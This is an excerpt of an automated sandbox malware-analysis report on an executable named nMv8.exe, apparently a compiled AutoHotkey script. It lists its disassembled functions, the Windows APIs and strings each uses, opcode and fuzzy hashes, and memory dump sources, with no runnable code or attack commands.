Opcode Fuzzy Hash: 1be77b9ed89d56087677b5337e07854c11674a9c9f4eeec723b406395e4980b3
Instruction Fuzzy Hash: DA4135B6A083529FC304DF19D580A6AB7E1FB88710F00896FE8598B350D734ED45CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00418CF0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

?C, xrefs: 00418D0E

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID:
String ID: ?C
API String ID: 0-468971734
Opcode ID: 5c1b95a3bcfc6f64b57b4d2b1b7d1268f48710216754d39de2e30127850cede7
Instruction ID: 471c2503842926da9f876606e6896ef5968deb4d601902c0bba4e0089ce8df50
Opcode Fuzzy Hash: 5c1b95a3bcfc6f64b57b4d2b1b7d1268f48710216754d39de2e30127850cede7
Instruction Fuzzy Hash: DA21F873A0131015DB206A6ABC016EBA394ABE1376F14443FFD45922D1EF2C8CD5A2EA

Uniqueness

Uniqueness Score: -1.00%

Function 0044F490, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91timeCOMMON

Download Yara Rule

APIs

FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0044F529
FileTimeToSystemTime.KERNEL32(?,?), ref: 0044F539

Strings

%04d%02d%02d%02d%02d%02d, xrefs: 0044F567

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Time$File$LocalSystem
String ID: %04d%02d%02d%02d%02d%02d
API String ID: 1748579591-4847443
Opcode ID: 8c5e601b59f405f645181b5d934393146cda03addc13663143fca5dce3130c23
Instruction ID: b25eb3951502644d325236b400274a20bb782a6da66cc3e6363140518461a583
Opcode Fuzzy Hash: 8c5e601b59f405f645181b5d934393146cda03addc13663143fca5dce3130c23
Instruction Fuzzy Hash: 433172B2508201AFD318CF19D84497BB7E4EF89311F05856FF895C72A1E738E945CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00438B40, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 00438BB6

Strings

Line#, xrefs: 00438B81
--->, xrefs: 00438BA9

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _wcsncpy
String ID: Line#$--->
API String ID: 1735881322-1677359465
Opcode ID: c9144151a0da219a7152cc7e241874fa24d21afc64f797d4a566e440723698af
Instruction ID: a68a1a0eb1be257525bb40d59d4f1301bc8f567dcf6422abb837590fb907973c
Opcode Fuzzy Hash: c9144151a0da219a7152cc7e241874fa24d21afc64f797d4a566e440723698af
Instruction Fuzzy Hash: 2E21BCB17043025FC718DE298895BABF3D5EBC8304F145A2EF946D3390DA74B90586AA

Uniqueness

Uniqueness Score: -1.00%

Function 00444E20, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 00444D70: GetFileAttributesW.KERNEL32(?), ref: 00444DA3

GetFileAttributesW.KERNEL32(?), ref: 00444EA8

Strings

"%s\%s, xrefs: 00444E7A
AutoHotkey.exe, xrefs: 00444E74

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: AttributesFile
String ID: "%s\%s$AutoHotkey.exe
API String ID: 3188754299-906933566
Opcode ID: c8d63d0fa3b7312e8660d1e46a77720e31fb689c09ccccc5558dbde475f11716
Instruction ID: d231f2ee10da9dba8ea8a40b8fc97b6879ea3209ff76fc178dd656e43524a0e3
Opcode Fuzzy Hash: c8d63d0fa3b7312e8660d1e46a77720e31fb689c09ccccc5558dbde475f11716
Instruction Fuzzy Hash: AD218371144305BBE320EB94F844BDBB394FBD9314F144D2FE59583281E739591D87AA

Uniqueness

Uniqueness Score: -1.00%

Function 00474E10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

InsertMenuItemW.USER32(?,00000000,00000001,00000030), ref: 00474EC2

Part of subcall function 004757A0: __wcsicoll.LIBCMT ref: 004757C8

GetMenuItemCount.USER32 ref: 00474EAC

Strings

0, xrefs: 00474E38

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: ItemMenu$CountInsert__wcsicoll
String ID: 0
API String ID: 858756630-4108050209
Opcode ID: d2bd6349b870ad5af3edb189c0103a9d0bc2d312c21b6b854cb5a596cec63e0f
Instruction ID: 4b0d2e6ecd8c7f976e9b647924ba6ae51de7ef7329161661391ff671543b3868
Opcode Fuzzy Hash: d2bd6349b870ad5af3edb189c0103a9d0bc2d312c21b6b854cb5a596cec63e0f
Instruction Fuzzy Hash: BC213C716097019FD724CF69D454A6BBBE8BF88720F008A1EF899C7790D774E904CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00498B83, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

B, xrefs: 00498BD0

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __getptd_noexit
String ID: B
API String ID: 3074181302-1255198513
Opcode ID: b5b12c542e9c37d966d66b4dded4be4baa43e972359e16b6a903401ca39e97a8
Instruction ID: 8c304ab961bddcdc6a305b4410fec8462ade9155c302231fe3b1e7276c3afb1b
Opcode Fuzzy Hash: b5b12c542e9c37d966d66b4dded4be4baa43e972359e16b6a903401ca39e97a8
Instruction Fuzzy Hash: 671142B29041599FDF009FD9C8818EEBBB8FB09314B14017FF510B6281DA3899058B79

Uniqueness

Uniqueness Score: -1.00%

Function 00444D70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 0047E600: _vswprintf_s.LIBCMT ref: 0047E619

GetFileAttributesW.KERNEL32(?), ref: 00444DA3
GetFileAttributesW.KERNEL32(?), ref: 00444DF9

Strings

"%s\%s, xrefs: 00444D80, 00444DD6

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: AttributesFile$_vswprintf_s
String ID: "%s\%s
API String ID: 1487582922-3478424877
Opcode ID: af84590e5371c2c03e043f349239303700c36f7f9b8e575d7c21a66da17ef2d4
Instruction ID: a35c4246ba2e7fd9c019b882b3b1ef1242e85dd241c3bfd94557e1953b4ff5f9
Opcode Fuzzy Hash: af84590e5371c2c03e043f349239303700c36f7f9b8e575d7c21a66da17ef2d4
Instruction Fuzzy Hash: 251129765002047BE3109F1DE844AAB7398FB85324F044A6BF41DC7382EB35AC258BF9

Uniqueness

Uniqueness Score: -1.00%

Function 0042CDC0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0042CE19

Strings

5M, xrefs: 0042CDE3
DJ, xrefs: 0042CDEF

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: 5M$DJ
API String ID: 3832890014-977008188
Opcode ID: 6d7effa61989296c33f3ff5820385a9e34345975791c7cb04ae031884ff0874a
Instruction ID: 71ae4156a2e5ea8a490e7b264e46ae0338a597369e40cb6eb6cea1caa14f0e77
Opcode Fuzzy Hash: 6d7effa61989296c33f3ff5820385a9e34345975791c7cb04ae031884ff0874a
Instruction Fuzzy Hash: 5E01F57370512557C720DEA8F8C05BFB7A5E780376F9A483BE905C6200F72AED09D29A

Uniqueness

Uniqueness Score: -1.00%

Function 00481B10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00481B74

Strings

Invalid value., xrefs: 00481B2F
An object., xrefs: 00481B2A

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _free
String ID: An object.$Invalid value.
API String ID: 269201875-731773362
Opcode ID: 6fed5aa15ede607300427f01cd7aec4aee82fbba668ec6bbaed461c0ac83722d
Instruction ID: 6ba435d64bd6a08fd05c5ba5a603b6f1d6d200a626ced5c7b01638235fc642c5
Opcode Fuzzy Hash: 6fed5aa15ede607300427f01cd7aec4aee82fbba668ec6bbaed461c0ac83722d
Instruction Fuzzy Hash: 1A118C705147414AC331DF28D408B97BBE4AF46310F048E5FE0D68B7A1D3A8FA86C795

Uniqueness

Uniqueness Score: -1.00%

Function 0047FB70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,Layout File,00000000,00000000), ref: 0047FB88
RegCloseKey.ADVAPI32(00000000,?,Layout File,00000000,00000000), ref: 0047FB93

Strings

Layout File, xrefs: 0047FB70, 0047FB7E

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: CloseQueryValue
String ID: Layout File
API String ID: 3356406503-1055935358
Opcode ID: 1b90e95d762dac5d63a54d75f39794dbf6296c92a269a4fdffe33cb8b6335baa
Instruction ID: 890387de567cfe3da7dcad9ea098ef8b248497c4938b5be9af5a3bb95db22bf1
Opcode Fuzzy Hash: 1b90e95d762dac5d63a54d75f39794dbf6296c92a269a4fdffe33cb8b6335baa
Instruction Fuzzy Hash: 970116B12196019ED764DF79D89475BB7E9EF58310F10883EE4CAC3390FB74A4948715

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9D0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 0040E910: __wcsicoll.LIBCMT ref: 0040E928
Part of subcall function 0040E910: __wcsicoll.LIBCMT ref: 0040E975

__wcsicoll.LIBCMT ref: 0040E9E7

Strings

Toggle, xrefs: 0040E9E1
@%K, xrefs: 0040E9F3

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: @%K$Toggle
API String ID: 3832890014-1775723024
Opcode ID: e66cb598090fbeabff624f78e2994aab6bf7bc91c401aa9211c7124437f2a5b0
Instruction ID: d10f48b5ced090b9fc67bb5112a8bff27049991d5c2d4a5766bcf89732dc60c6
Opcode Fuzzy Hash: e66cb598090fbeabff624f78e2994aab6bf7bc91c401aa9211c7124437f2a5b0
Instruction Fuzzy Hash: 21F0242271011112EA20263AAD023A32151BB78754F090D7BEC05F63CAF36ADE55C5A8

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25clipboardCOMMON

Download Yara Rule

APIs

IsClipboardFormatAvailable.USER32(0000000D), ref: 00401012
IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Strings

<<>>, xrefs: 0040101E

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: AvailableClipboardFormat
String ID: <<>>
API String ID: 778505046-913080871
Opcode ID: 8c6517f9b533f61741500d6169196b1c8e5082a7402c0f87c3a710bf96d4dfc0
Instruction ID: 68c4d44870cdb3f0bc1b44cbb0f3857e74037eda646ceda61d7f0060a5bd8b1b
Opcode Fuzzy Hash: 8c6517f9b533f61741500d6169196b1c8e5082a7402c0f87c3a710bf96d4dfc0
Instruction Fuzzy Hash: F8E0862070126143EB70B63E7DC0BA62784DB25760B00113FF464E7AE5DB7CDC8116AC

Uniqueness

Uniqueness Score: -1.00%

Function 00405050, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22clipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32(00000000,00404CC6,?,?,00401033), ref: 0040505F
CloseClipboard.USER32(00404CC6,?,?,00401033), ref: 0040506C

Strings

GlobalLock, xrefs: 0040508E

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: ClipboardCloseGlobalUnlock
String ID: GlobalLock
API String ID: 3794156920-2848605275
Opcode ID: df53da328c838707879d63bd24ea22cdfdc4718846fdb7de8a84321aa478686f
Instruction ID: bd92ab472ce061f00f052f6e0b802034d769f96baf6bc131ffc073604d2fb094
Opcode Fuzzy Hash: df53da328c838707879d63bd24ea22cdfdc4718846fdb7de8a84321aa478686f
Instruction Fuzzy Hash: 3AE06D30500B02CBE3305F15C45835BB6F0EF91301F64442FA586527E0CBBC5884CE88

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: nMv8.exe PID: 2388 Parent PID: 1500 nMv8.exeCOMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.3%
Total number of Nodes:	588
Total number of Limit Nodes:	26

Executed Functions

Function 00404150, Relevance: 70.6, APIs: 25, Strings: 15, Instructions: 594
sleepwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(004D65E8), ref: 00404169
SetErrorMode.KERNEL32(00000001), ref: 00404171

Part of subcall function 0044AD70: GetCurrentDirectoryW.KERNEL32(00008000,?,?,0040417E), ref: 0044AD87

__wcsicoll.LIBCMT ref: 004042CF
__wcsicoll.LIBCMT ref: 004042E5
__wcsicoll.LIBCMT ref: 004042FB
__wcsicoll.LIBCMT ref: 00404311
__wcsnicmp.LIBCMT ref: 00404329
__wcsicoll.LIBCMT ref: 00404361
__wcsnicmp.LIBCMT ref: 004043CA
__wcsnicmp.LIBCMT ref: 004043FD
_wcsrchr.LIBCMT ref: 0040442A
FindWindowW.USER32(AutoHotkey,02F20188), ref: 004046E0
FindWindowW.USER32(AutoHotkey,02F20188), ref: 0040474A
PostMessageW.USER32(00000000,00000044,00000406,00000000), ref: 00404761
Sleep.KERNEL32(00000014), ref: 00404771
IsWindow.USER32(00000000), ref: 00404774
Sleep.KERNEL32(00000014), ref: 004047AE
IsWindow.USER32(00000000), ref: 004047B1
Sleep.KERNEL32(00000064), ref: 004047BD
SystemParametersInfoW.USER32 ref: 004047D3
SystemParametersInfoW.USER32 ref: 004047ED
_setvbuf.LIBCMT ref: 00404811
_malloc.LIBCMT ref: 0040482A
_memset.LIBCMT ref: 0040483F
InitCommonControlsEx.COMCTL32 ref: 00404865

Strings

Could not close the previous instance of this script. Keep waiting?, xrefs: 00404793
/CP, xrefs: 004043C4
9000, xrefs: 00404472, 00404492
@cM, xrefs: 00404635
Out of memory., xrefs: 004041C7
An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta, xrefs: 00404716
/Debug, xrefs: 004043F7
/force, xrefs: 0040430B
A_Args, xrefs: 00404592, 004045C0
/iLib, xrefs: 0040435B
AutoHotkey, xrefs: 004046DB, 00404745
/restart, xrefs: 004042DF
/ErrorStdOut, xrefs: 00404323
localhost, xrefs: 00404483
Clipboard, xrefs: 004048BA

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll$Window$Sleep__wcsnicmp$FindInfoParametersSystem$CommonControlsCriticalCurrentDirectoryErrorInitInitializeMessageModePostSection_malloc_memset_setvbuf_wcsrchr
String ID: /CP$/Debug$/ErrorStdOut$/force$/iLib$/restart$9000$@cM$A_Args$An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta$AutoHotkey$Clipboard$Could not close the previous instance of this script. Keep waiting?$Out of memory.$localhost
API String ID: 1826560011-1994657819
Opcode ID: 870f76b259918fea3ab19f2b2b05738a812b78efcb99b5b61cc13112a80149ac
Instruction ID: bcd9d1683c603e65e372c6682ffa30271c47dadf0065143f1497cc8438a4fa5a
Opcode Fuzzy Hash: 870f76b259918fea3ab19f2b2b05738a812b78efcb99b5b61cc13112a80149ac
Instruction Fuzzy Hash: 6C12F4B1B042006AD720AB699C45B6B37D49BD6708F14453FFA41A73C1EB7CDD4187AE

Uniqueness

Uniqueness Score: -1.00%

Function 00450AE0, Relevance: 21.8, APIs: 6, Strings: 6, Instructions: 797COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00450C2D
__wcsnicmp.LIBCMT ref: 00450C8E
_memset.LIBCMT ref: 00450D31
__wcstoui64.LIBCMT ref: 00450EC0
FreeLibrary.KERNEL32(?), ref: 0045141A

Strings

DllCall, xrefs: 00450B4A, 00450CCA, 0045100D
This DllCall requires a prior VarSetCapacity., xrefs: 00450FB8
@%K, xrefs: 00450B4F
Int, xrefs: 00450CAC
CDecl, xrefs: 00450C21, 00450C88
, xrefs: 00450BD1

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsnicmp$FreeLibrary__wcstoui64_memset
String ID: $@%K$CDecl$DllCall$Int$This DllCall requires a prior VarSetCapacity.
API String ID: 886327013-889194729
Opcode ID: f9c2d35472f796efe49b565942df9734269084f9e3f791c4d9bd4a32bb455281
Instruction ID: 458a19b4f9fa1cbb78d7bcbcf9cede378d98c74bb6c25e6c82ae2e227ef40dd2
Opcode Fuzzy Hash: f9c2d35472f796efe49b565942df9734269084f9e3f791c4d9bd4a32bb455281
Instruction Fuzzy Hash: C052E274A002059FDB24CF58C8817AAB7B0FF05306F24856FEC169B392D779AC49CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0047F410, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 164
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcschr.LIBCMT ref: 0047F4DA
FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,!F@,?,004D8728), ref: 0047F502
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,!F@,?,004D8728), ref: 0047F51A
_wcschr.LIBCMT ref: 0047F56D
FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,!F@,?,004D8728), ref: 0047F592
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,!F@,?,004D8728), ref: 0047F5A2

Strings

!F@, xrefs: 0047F429

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Find$CloseFileFirst_wcschr
String ID: !F@
API String ID: 1717823228-372333782
Opcode ID: 75c963de2109aba4f99990059550f25b8cd5a3267534f1bc7774211c30a6f399
Instruction ID: 3962e247aa8d13e049c217f0dd33917bd960985c435d90c69bd457938b023c4f
Opcode Fuzzy Hash: 75c963de2109aba4f99990059550f25b8cd5a3267534f1bc7774211c30a6f399
Instruction Fuzzy Hash: 5A512972510301ABCB109BA4CC85EEB73A8AF95315F45C63EED18A7281F778E90DC799

Uniqueness

Uniqueness Score: -1.00%

Function 004A27E2, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000A27A0), ref: 004A27E7

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 429d3398c94996722cb4c202dcb071b3be08e049a3cc93c5ecfde10a2eaccd18
Instruction ID: 30e81db898e0124d61999fd995aa2926cafb68cde4a2f1fae1d6406106e3f964
